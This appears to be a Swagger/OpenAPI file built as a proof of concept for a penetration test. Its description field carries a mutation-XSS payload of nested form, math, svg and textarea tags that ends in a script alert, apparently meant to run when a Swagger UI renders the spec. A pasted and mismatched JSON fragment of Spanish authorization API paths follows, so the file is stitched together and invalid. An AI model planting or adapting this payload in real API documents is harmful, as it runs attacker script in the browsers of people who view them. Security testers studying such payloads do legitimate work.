swagger: '3.0.1'
info:
  title: Prueba de Concepto - Cross-Site Scripting
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>alert(1)</script></form>
  version: PentestKPMG
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /MetodoMalicioso:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - POC_XSS
      operationId: findAccounts
      summary: Finds all accounts
"paths": {
    "/api/AutorizacionesV1/{IdDeDespacho}": {
      "get": {
        "tags": [
          "AutorizacionesV1"
        ],
        "parameters": [
          {
            "name": "IdDeDespacho",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string",
              "format": "uuid"
            }
          }
        ],
        "responses": {
          "200": {
            "description": "Success"
          }
        }
      },
      "put": {
        "tags": [
          "AutorizacionesV1"
        ],
        "parameters": [
          {
            "name": "IdDeDespacho",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string",
              "format": "uuid"
            }
          }
        ],
        "requestBody": {
          "content": {
            "application/json-patch+json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            },
            "application/json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            },
            "text/json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            },
            "application/*+json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            }
          }
        },
        "responses": {
          "200": {
            "description": "Success"
          }
        }
      }
    },
    "/api/AutorizacionesV1": {
      "post": {
        "tags": [
          "AutorizacionesV1"
        ],
        "requestBody": {
          "content": {
            "application/json-patch+json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            },
            "application/json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            },
            "text/json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            },
            "application/*+json": {
              "schema": {
                "$ref": "#/components/schemas/AutorizacionDTO"
              }
            }
          }
        },
        "responses": {
          "200": {
            "description": "Success"
          }
        }
      },
      "get": {
        "tags": [
          "AutorizacionesV1"
        ],
        "parameters": [
          {
            "name": "fechaDesde",
            "in": "query",
            "schema": {
              "type": "string",
              "format": "date-time",
              "nullable": true
            }
          },
          {
            "name": "fechaHasta",
            "in": "query",
            "schema": {
              "type": "string",
              "format": "date-time",
              "nullable": true
            }
          },
          {
            "name": "estado",
            "in": "query",
            "schema": {
              "type": "integer",
              "format": "int32",
              "nullable": true
            }
          }
        ],
        "responses": {
          "200": {
            "description": "Success"
          }
        }
      }
    },
    "/api/AutorizacionesV1/Preautorizaciones/{Id}": {
      "get": {
        "tags": [
          "AutorizacionesV1"
        ],
        "parameters": [
          {
            "name": "Id",
            "in": "path",
            "required": true,
            "schema": {
              "type": "string",
              "format": "uuid"
            }
          }
        ],
        "responses": {
          "200": {
            "description": "Success"
          }
        }
      }
    }
